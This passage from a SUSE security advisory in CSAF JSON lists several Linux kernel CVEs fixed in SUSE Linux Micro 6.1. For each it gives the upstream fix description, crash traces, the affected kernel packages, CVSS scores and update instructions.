"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: refresh inline data size before write operations\n\nThe cached ei-\u003ei_inline_size can become stale between the initial size\ncheck and when ext4_update_inline_data()/ext4_create_inline_data() use\nit. Although ext4_get_max_inline_size() reads the correct value at the\ntime of the check, concurrent xattr operations can modify i_inline_size\nbefore ext4_write_lock_xattr() is acquired.\n\nThis causes ext4_update_inline_data() and ext4_create_inline_data() to\nwork with stale capacity values, leading to a BUG_ON() crash in\next4_write_inline_data():\n\n kernel BUG at fs/ext4/inline.c:1331!\n BUG_ON(pos + len \u003e EXT4_I(inode)-\u003ei_inline_size);\n\nThe race window:\n1. ext4_get_max_inline_size() reads i_inline_size = 60 (correct)\n2. Size check passes for 50-byte write\n3. [Another thread adds xattr, i_inline_size changes to 40]\n4. ext4_write_lock_xattr() acquires lock\n5. ext4_update_inline_data() uses stale i_inline_size = 60\n6. Attempts to write 50 bytes but only 40 bytes actually available\n7. BUG_ON() triggers\n\nFix this by recalculating i_inline_size via ext4_find_inline_data_nolock()\nimmediately after acquiring xattr_sem. This ensures ext4_update_inline_data()\nand ext4_create_inline_data() work with current values that are protected\nfrom concurrent modifications.\n\nThis is similar to commit a54c4613dac1 (\"ext4: fix race writing to an\ninline_data file while its xattrs are changing\") which fixed i_inline_off\nstaleness. This patch addresses the related i_inline_size staleness issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68264",
"url": "https://www.suse.com/security/cve/CVE-2025-68264"
},
{
"category": "external",
"summary": "SUSE Bug 1255380 for CVE-2025-68264",
"url": "https://bugzilla.suse.com/1255380"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68264"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68286",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68286"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check NULL before accessing\n\n[WHAT]\nIGT kms_cursor_legacy\u0027s long-nonblocking-modeset-vs-cursor-atomic\nfails with NULL pointer dereference. This can be reproduced with\nboth an eDP panel and a DP monitors connected.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 13 UID: 0 PID: 2960 Comm: kms_cursor_lega Not tainted\n6.16.0-99-custom #8 PREEMPT(voluntary)\n Hardware name: AMD ........\n RIP: 0010:dc_stream_get_scanoutpos+0x34/0x130 [amdgpu]\n Code: 57 4d 89 c7 41 56 49 89 ce 41 55 49 89 d5 41 54 49\n 89 fc 53 48 83 ec 18 48 8b 87 a0 64 00 00 48 89 75 d0 48 c7 c6 e0 41 30\n c2 \u003c48\u003e 8b 38 48 8b 9f 68 06 00 00 e8 8d d7 fd ff 31 c0 48 81 c3 e0 02\n RSP: 0018:ffffd0f3c2bd7608 EFLAGS: 00010292\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffd0f3c2bd7668\n RDX: ffffd0f3c2bd7664 RSI: ffffffffc23041e0 RDI: ffff8b32494b8000\n RBP: ffffd0f3c2bd7648 R08: ffffd0f3c2bd766c R09: ffffd0f3c2bd7760\n R10: ffffd0f3c2bd7820 R11: 0000000000000000 R12: ffff8b32494b8000\n R13: ffffd0f3c2bd7664 R14: ffffd0f3c2bd7668 R15: ffffd0f3c2bd766c\n FS: 000071f631b68700(0000) GS:ffff8b399f114000(0000)\nknlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000001b8105000 CR4: 0000000000f50ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n dm_crtc_get_scanoutpos+0xd7/0x180 [amdgpu]\n amdgpu_display_get_crtc_scanoutpos+0x86/0x1c0 [amdgpu]\n ? __pfx_amdgpu_crtc_get_scanout_position+0x10/0x10[amdgpu]\n amdgpu_crtc_get_scanout_position+0x27/0x50 [amdgpu]\n drm_crtc_vblank_helper_get_vblank_timestamp_internal+0xf7/0x400\n drm_crtc_vblank_helper_get_vblank_timestamp+0x1c/0x30\n drm_crtc_get_last_vbltimestamp+0x55/0x90\n drm_crtc_next_vblank_start+0x45/0xa0\n drm_atomic_helper_wait_for_fences+0x81/0x1f0\n ...\n\n(cherry picked from commit 621e55f1919640acab25383362b96e65f2baea3c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68286",
"url": "https://www.suse.com/security/cve/CVE-2025-68286"
},
{
"category": "external",
"summary": "SUSE Bug 1255351 for CVE-2025-68286",
"url": "https://bugzilla.suse.com/1255351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68286"
},
{
"cve": "CVE-2025-68287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68287"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: Fix race condition between concurrent dwc3_remove_requests() call paths\n\nThis patch addresses a race condition caused by unsynchronized\nexecution of multiple call paths invoking `dwc3_remove_requests()`,\nleading to premature freeing of USB requests and subsequent crashes.\n\nThree distinct execution paths interact with `dwc3_remove_requests()`:\nPath 1:\nTriggered via `dwc3_gadget_reset_interrupt()` during USB reset\nhandling. The call stack includes:\n- `dwc3_ep0_reset_state()`\n- `dwc3_ep0_stall_and_restart()`\n- `dwc3_ep0_out_start()`\n- `dwc3_remove_requests()`\n- `dwc3_gadget_del_and_unmap_request()`\n\nPath 2:\nAlso initiated from `dwc3_gadget_reset_interrupt()`, but through\n`dwc3_stop_active_transfers()`. The call stack includes:\n- `dwc3_stop_active_transfers()`\n- `dwc3_remove_requests()`\n- `dwc3_gadget_del_and_unmap_request()`\n\nPath 3:\nOccurs independently during `adb root` execution, which triggers\nUSB function unbind and bind operations. The sequence includes:\n- `gserial_disconnect()`\n- `usb_ep_disable()`\n- `dwc3_gadget_ep_disable()`\n- `dwc3_remove_requests()` with `-ESHUTDOWN` status\n\nPath 3 operates asynchronously and lacks synchronization with Paths\n1 and 2. When Path 3 completes, it disables endpoints and frees \u0027out\u0027\nrequests. If Paths 1 or 2 are still processing these requests,\naccessing freed memory leads to a crash due to use-after-free conditions.\n\nTo fix this added check for request completion and skip processing\nif already completed and added the request status for ep0 while queue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
